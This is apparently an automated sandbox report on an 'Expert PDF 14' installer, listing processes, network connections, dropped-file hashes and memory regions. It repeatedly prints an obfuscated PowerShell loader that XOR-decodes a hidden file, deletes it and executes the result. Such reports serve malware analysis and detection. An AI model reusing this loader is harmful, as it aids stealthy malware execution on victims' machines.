C:\ProgramData\Expert PDF 14\Installation\Expert_PDF_14_Installer.exe

"C:\ProgramData\Expert PDF 14\Installation\Expert_PDF_14_Installer.exe" /RegServer

C:\Windows\SysWOW64\DllHost.exe

C:\Windows\SysWOW64\DllHost.exe /Processid:{D512BD03-0077-4504-AE19-566B43F44E19}

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\d42bf9d5b6efb8ac6fe79a881e3d037e\f612d312080190743c333ce6f036a08b\774993c53916d2cabd3093113aba2438\4015a7944708b530fadfa1e4d3902c78\3e985328b31761cd84eaaa320cd28e3c\f104fb2467d873ac041bbbdffbb51cd0\61febf04862f7148e24a3df67bcbb2b8';$xk='oVeUiAIkpPxaLwSNDBrQOGbFzmnRTHdsMucCjEltXYvJhyWqfKZg';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\d42bf9d5b6efb8ac6fe79a881e3d037e\f612d312080190743c333ce6f036a08b\774993c53916d2cabd3093113aba2438\4015a7944708b530fadfa1e4d3902c78\3e985328b31761cd84eaaa320cd28e3c\f104fb2467d873ac041bbbdffbb51cd0\61febf04862f7148e24a3df67bcbb2b8';$xk='oVeUiAIkpPxaLwSNDBrQOGbFzmnRTHdsMucCjEltXYvJhyWqfKZg';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\d42bf9d5b6efb8ac6fe79a881e3d037e\f612d312080190743c333ce6f036a08b\774993c53916d2cabd3093113aba2438\4015a7944708b530fadfa1e4d3902c78\3e985328b31761cd84eaaa320cd28e3c\f104fb2467d873ac041bbbdffbb51cd0\61febf04862f7148e24a3df67bcbb2b8';$xk='oVeUiAIkpPxaLwSNDBrQOGbFzmnRTHdsMucCjEltXYvJhyWqfKZg';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\d42bf9d5b6efb8ac6fe79a881e3d037e\f612d312080190743c333ce6f036a08b\774993c53916d2cabd3093113aba2438\4015a7944708b530fadfa1e4d3902c78\3e985328b31761cd84eaaa320cd28e3c\f104fb2467d873ac041bbbdffbb51cd0\61febf04862f7148e24a3df67bcbb2b8';$xk='oVeUiAIkpPxaLwSNDBrQOGbFzmnRTHdsMucCjEltXYvJhyWqfKZg';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\d42bf9d5b6efb8ac6fe79a881e3d037e\f612d312080190743c333ce6f036a08b\774993c53916d2cabd3093113aba2438\4015a7944708b530fadfa1e4d3902c78\3e985328b31761cd84eaaa320cd28e3c\f104fb2467d873ac041bbbdffbb51cd0\61febf04862f7148e24a3df67bcbb2b8';$xk='oVeUiAIkpPxaLwSNDBrQOGbFzmnRTHdsMucCjEltXYvJhyWqfKZg';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\d42bf9d5b6efb8ac6fe79a881e3d037e\f612d312080190743c333ce6f036a08b\774993c53916d2cabd3093113aba2438\4015a7944708b530fadfa1e4d3902c78\3e985328b31761cd84eaaa320cd28e3c\f104fb2467d873ac041bbbdffbb51cd0\61febf04862f7148e24a3df67bcbb2b8';$xk='oVeUiAIkpPxaLwSNDBrQOGbFzmnRTHdsMucCjEltXYvJhyWqfKZg';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\d42bf9d5b6efb8ac6fe79a881e3d037e\f612d312080190743c333ce6f036a08b\774993c53916d2cabd3093113aba2438\4015a7944708b530fadfa1e4d3902c78\3e985328b31761cd84eaaa320cd28e3c\f104fb2467d873ac041bbbdffbb51cd0\61febf04862f7148e24a3df67bcbb2b8';$xk='oVeUiAIkpPxaLwSNDBrQOGbFzmnRTHdsMucCjEltXYvJhyWqfKZg';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\d42bf9d5b6efb8ac6fe79a881e3d037e\f612d312080190743c333ce6f036a08b\774993c53916d2cabd3093113aba2438\4015a7944708b530fadfa1e4d3902c78\3e985328b31761cd84eaaa320cd28e3c\f104fb2467d873ac041bbbdffbb51cd0\61febf04862f7148e24a3df67bcbb2b8';$xk='oVeUiAIkpPxaLwSNDBrQOGbFzmnRTHdsMucCjEltXYvJhyWqfKZg';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\d42bf9d5b6efb8ac6fe79a881e3d037e\f612d312080190743c333ce6f036a08b\774993c53916d2cabd3093113aba2438\4015a7944708b530fadfa1e4d3902c78\3e985328b31761cd84eaaa320cd28e3c\f104fb2467d873ac041bbbdffbb51cd0\61febf04862f7148e24a3df67bcbb2b8';$xk='oVeUiAIkpPxaLwSNDBrQOGbFzmnRTHdsMucCjEltXYvJhyWqfKZg';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\d42bf9d5b6efb8ac6fe79a881e3d037e\f612d312080190743c333ce6f036a08b\774993c53916d2cabd3093113aba2438\4015a7944708b530fadfa1e4d3902c78\3e985328b31761cd84eaaa320cd28e3c\f104fb2467d873ac041bbbdffbb51cd0\61febf04862f7148e24a3df67bcbb2b8';$xk='oVeUiAIkpPxaLwSNDBrQOGbFzmnRTHdsMucCjEltXYvJhyWqfKZg';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"

Network

Country Destination Domain Proto
US 8.8.8.8:53 76.38.195.152.in-addr.arpa udp
US 8.8.8.8:53 199.176.139.52.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 33.146.190.20.in-addr.arpa udp
US 8.8.8.8:53 api-updateservice.expert-pdf.com udp
CA 64.15.159.225:443 api-updateservice.expert-pdf.com tcp
US 8.8.8.8:53 225.159.15.64.in-addr.arpa udp
US 8.8.8.8:53 52.212.199.91.in-addr.arpa udp
US 8.8.8.8:53 68.32.18.104.in-addr.arpa udp
US 8.8.8.8:53 wsgeoip.expert-pdf.com udp
CA 64.15.159.225:443 wsgeoip.expert-pdf.com tcp
US 8.8.8.8:53 188.155.64.172.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
US 8.8.8.8:53 151.122.125.40.in-addr.arpa udp
US 104.208.16.90:443 tcp
US 209.197.3.8:80 tcp
US 209.197.3.8:80 tcp
US 209.197.3.8:80 tcp
NL 173.223.113.164:443 tcp
NL 173.223.113.131:80 tcp
US 204.79.197.203:80 tcp
US 8.8.8.8:53 2.77.109.52.in-addr.arpa udp
NL 84.53.175.11:80 tcp
US 8.8.8.8:53 210.81.184.52.in-addr.arpa udp
US 8.8.8.8:53 113.238.32.23.in-addr.arpa udp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
US 8.8.8.8:53 assets.msn.com udp
GB 95.101.143.120:443 assets.msn.com tcp
ES 5.189.222.80:80 tcp
US 8.8.8.8:53 120.143.101.95.in-addr.arpa udp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
US 8.8.8.8:53 download14.expert-pdf.com udp
CA 64.15.159.225:80 download14.expert-pdf.com tcp
CA 64.15.159.225:443 download14.expert-pdf.com tcp
US 8.8.8.8:53 redamex.expert-pdf.com udp
CA 64.15.159.204:443 redamex.expert-pdf.com tcp
CA 64.15.159.225:80 download14.expert-pdf.com tcp
CA 64.15.159.225:443 download14.expert-pdf.com tcp
ES 5.189.222.80:80 tcp
US 8.8.8.8:53 204.159.15.64.in-addr.arpa udp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
US 8.8.8.8:53 12.173.189.20.in-addr.arpa udp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp

Files

memory/1644-133-0x0000000000400000-0x0000000000501000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-AB559.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp

MD5 a95712856401dda069ee07c719bdb2ab
SHA1 73293e45116e0930d78087741016cde920922a74
SHA256 b4878d6b9d7462cafe81d20da148a44750aa707f4e34eae1f23f21f9e0d9afa0
SHA512 2ea973307830b193379a0b7698682bfecdfcc6bab685dcf60af1c23c94b16b862924148a2f9e8b2ac2b7734c3552193dc0459c7961ab8730b0282101fa22ff85

C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\_isetup\_isdecmp.dll

MD5 c6ae924ad02500284f7e4efa11fa7cfc
SHA1 2a7770b473b0a7dc9a331d017297ff5af400fed8
SHA256 31d04c1e4bfdfa34704c142fa98f80c0a3076e4b312d6ada57c4be9d9c7dcf26
SHA512 f321e4820b39d1642fc43bf1055471a323edcc0c4cbd3ddd5ad26a7b28c4fb9fc4e57c00ae7819a4f45a3e0bb9c7baa0ba19c3ceedacf38b911cdf625aa7ddae

C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\_isetup\_isdecmp.dll

MD5 c6ae924ad02500284f7e4efa11fa7cfc
SHA1 2a7770b473b0a7dc9a331d017297ff5af400fed8
SHA256 31d04c1e4bfdfa34704c142fa98f80c0a3076e4b312d6ada57c4be9d9c7dcf26
SHA512 f321e4820b39d1642fc43bf1055471a323edcc0c4cbd3ddd5ad26a7b28c4fb9fc4e57c00ae7819a4f45a3e0bb9c7baa0ba19c3ceedacf38b911cdf625aa7ddae

memory/3672-144-0x0000000002810000-0x0000000002811000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe

MD5 440d4f0c478b77d0e1a95e8165dfb650
SHA1 d8cd10e080167a93273a6969b61648ce9b9debb2
SHA256 19834ba63fc5f104f81d991a93593acde4bb49c10883e66344b8797caf4a5462
SHA512 a8c0b99c9f7f64ad440dd640f5e00b471514fd322af565796dd8fac8b4aabb693ccbcf1698e7082a3e1e188ead68081db13197555ba6b1ff5ef1dbc7b32bbbc5

C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe

MD5 440d4f0c478b77d0e1a95e8165dfb650
SHA1 d8cd10e080167a93273a6969b61648ce9b9debb2
SHA256 19834ba63fc5f104f81d991a93593acde4bb49c10883e66344b8797caf4a5462
SHA512 a8c0b99c9f7f64ad440dd640f5e00b471514fd322af565796dd8fac8b4aabb693ccbcf1698e7082a3e1e188ead68081db13197555ba6b1ff5ef1dbc7b32bbbc5

C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe

MD5 440d4f0c478b77d0e1a95e8165dfb650
SHA1 d8cd10e080167a93273a6969b61648ce9b9debb2
SHA256 19834ba63fc5f104f81d991a93593acde4bb49c10883e66344b8797caf4a5462
SHA512 a8c0b99c9f7f64ad440dd640f5e00b471514fd322af565796dd8fac8b4aabb693ccbcf1698e7082a3e1e188ead68081db13197555ba6b1ff5ef1dbc7b32bbbc5

C:\ProgramData\Expert PDF 14\Installation\Statistics.dll

MD5 e645ca01c01f9f8489c07a6b41fbd318
SHA1 3e8ea394f6605bd8529c58a143f01675adee371a
SHA256 a9145b41491019af4e89c5736c0d9d1fc83ab9786ec3dfb27da9be4e40cff27e
SHA512 c220bd620f03f38286899ed124abde69ed0812c2c1ef84031a02abd39faa4975255bc6a2bff8900d0294ac2f508344131be8cc6d8765aa46d430a135bb1af2b6

C:\ProgramData\Expert PDF 14\Installation\Statistics.dll

MD5 e645ca01c01f9f8489c07a6b41fbd318
SHA1 3e8ea394f6605bd8529c58a143f01675adee371a
SHA256 a9145b41491019af4e89c5736c0d9d1fc83ab9786ec3dfb27da9be4e40cff27e
SHA512 c220bd620f03f38286899ed124abde69ed0812c2c1ef84031a02abd39faa4975255bc6a2bff8900d0294ac2f508344131be8cc6d8765aa46d430a135bb1af2b6

C:\ProgramData\Expert PDF 14\Installation\Expert_PDF_14_Installer.exe

MD5 440d4f0c478b77d0e1a95e8165dfb650
SHA1 d8cd10e080167a93273a6969b61648ce9b9debb2
SHA256 19834ba63fc5f104f81d991a93593acde4bb49c10883e66344b8797caf4a5462
SHA512 a8c0b99c9f7f64ad440dd640f5e00b471514fd322af565796dd8fac8b4aabb693ccbcf1698e7082a3e1e188ead68081db13197555ba6b1ff5ef1dbc7b32bbbc5

C:\ProgramData\Expert PDF 14\Installation\Expert_PDF_14_Installer.exe

MD5 440d4f0c478b77d0e1a95e8165dfb650
SHA1 d8cd10e080167a93273a6969b61648ce9b9debb2
SHA256 19834ba63fc5f104f81d991a93593acde4bb49c10883e66344b8797caf4a5462
SHA512 a8c0b99c9f7f64ad440dd640f5e00b471514fd322af565796dd8fac8b4aabb693ccbcf1698e7082a3e1e188ead68081db13197555ba6b1ff5ef1dbc7b32bbbc5

memory/1644-176-0x0000000000400000-0x0000000000501000-memory.dmp

C:\ProgramData\Expert PDF 14\Installation\Statistics.dll

MD5 e645ca01c01f9f8489c07a6b41fbd318
SHA1 3e8ea394f6605bd8529c58a143f01675adee371a
SHA256 a9145b41491019af4e89c5736c0d9d1fc83ab9786ec3dfb27da9be4e40cff27e
SHA512 c220bd620f03f38286899ed124abde69ed0812c2c1ef84031a02abd39faa4975255bc6a2bff8900d0294ac2f508344131be8cc6d8765aa46d430a135bb1af2b6

C:\ProgramData\Expert PDF 14\Installation\Statistics.dll

MD5 e645ca01c01f9f8489c07a6b41fbd318
SHA1 3e8ea394f6605bd8529c58a143f01675adee371a
SHA256 a9145b41491019af4e89c5736c0d9d1fc83ab9786ec3dfb27da9be4e40cff27e
SHA512 c220bd620f03f38286899ed124abde69ed0812c2c1ef84031a02abd39faa4975255bc6a2bff8900d0294ac2f508344131be8cc6d8765aa46d430a135bb1af2b6

memory/1924-191-0x0000000000C70000-0x0000000000CA6000-memory.dmp

memory/1924-192-0x0000000004E20000-0x0000000005448000-memory.dmp

memory/3672-193-0x0000000000400000-0x0000000000723000-memory.dmp

memory/1924-197-0x00000000047E0000-0x00000000047F0000-memory.dmp

memory/4392-198-0x00000000030B0000-0x00000000030C0000-memory.dmp

memory/3676-196-0x0000000004520000-0x0000000004530000-memory.dmp

memory/4392-199-0x00000000030B0000-0x00000000030C0000-memory.dmp

memory/4252-200-0x0000000002F20000-0x0000000002F30000-memory.dmp

memory/3676-201-0x0000000004520000-0x0000000004530000-memory.dmp

memory/3080-202-0x0000000005610000-0x0000000005620000-memory.dmp

memory/1568-203-0x0000000003080000-0x0000000003090000-memory.dmp

memory/3080-204-0x0000000005980000-0x00000000059A2000-memory.dmp

memory/4392-206-0x0000000005D70000-0x0000000005DD6000-memory.dmp

memory/2492-205-0x0000000004F10000-0x0000000004F20000-memory.dmp

memory/4392-208-0x0000000005DE0000-0x0000000005E46000-memory.dmp

memory/980-209-0x0000000003240000-0x0000000003250000-memory.dmp

memory/980-207-0x0000000003240000-0x0000000003250000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_umbfj5me.3wd.psm1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3672-293-0x0000000000400000-0x0000000000723000-memory.dmp

memory/5020-303-0x0000000005230000-0x0000000005240000-memory.dmp

memory/2492-304-0x0000000004F10000-0x0000000004F20000-memory.dmp

memory/1644-306-0x0000000000400000-0x0000000000501000-memory.dmp

memory/3080-307-0x0000000006850000-0x000000000686E000-memory.dmp

C:\Users\Admin\d42bf9d5b6efb8ac6fe79a881e3d037e\f612d312080190743c333ce6f036a08b\774993c53916d2cabd3093113aba2438\4015a7944708b530fadfa1e4d3902c78\3e985328b31761cd84eaaa320cd28e3c\f104fb2467d873ac041bbbdffbb51cd0\61febf04862f7148e24a3df67bcbb2b8

MD5 9ad7347a02f60aa376133856f8618acb
SHA1 3377b9738c82647ff6f0fc741c58548fa8caaf31
SHA256 a4f9f4c9dfbe2e61dd8ebe5d1d9bd8a519d5a7833f2653820671a16b49855fea
SHA512 a912a3e881168ce1dc23d0c715323a7b02b0c522fd49f7da236d97f8cbb183c2d4bf2be97bac973dfba5852a607ad849e815afdd1c7f033bddafcc0303f18687

memory/5020-309-0x0000000005230000-0x0000000005240000-memory.dmp

memory/4392-310-0x00000000030B0000-0x00000000030C0000-memory.dmp

memory/2456-311-0x0000000002590000-0x00000000025A0000-memory.dmp

memory/1568-313-0x0000000003080000-0x0000000003090000-memory.dmp

memory/3676-312-0x0000000004520000-0x0000000004530000-memory.dmp

memory/3676-315-0x0000000005F30000-0x0000000005F4A000-memory.dmp

memory/5020-316-0x0000000006C90000-0x0000000006CB2000-memory.dmp

memory/4252-314-0x00000000074C0000-0x0000000007556000-memory.dmp

memory/4392-317-0x0000000007A10000-0x0000000007FB4000-memory.dmp

memory/4252-318-0x0000000002F20000-0x0000000002F30000-memory.dmp

memory/2492-319-0x0000000004F10000-0x0000000004F20000-memory.dmp

memory/5020-320-0x0000000008C40000-0x00000000092BA000-memory.dmp

memory/3676-321-0x0000000004520000-0x0000000004530000-memory.dmp

memory/3676-323-0x0000000004520000-0x0000000004530000-memory.dmp

memory/4392-322-0x00000000030B0000-0x00000000030C0000-memory.dmp

memory/1568-324-0x0000000003080000-0x0000000003090000-memory.dmp

memory/4252-326-0x0000000002F20000-0x0000000002F30000-memory.dmp

memory/4252-330-0x0000000002F20000-0x0000000002F30000-memory.dmp

C:\Users\Admin\AppData\Roaming\wGITVhmXWQSqpZKRCtElfrun\TesVNngiWXdzUEPmMOBYwhcAuCZyRfIktrSaKvjFpJQLGlxbHoDq

MD5 21fb2997c5f3ae724b68c0abe70d24dc
SHA1 a67e74c07b67c7b88260bc0b79d2306312f01b41
SHA256 8ffb8a0883f778a001250e734ec0d1ca8a3298a5c0bbcf413925f90d8e5f2fb2
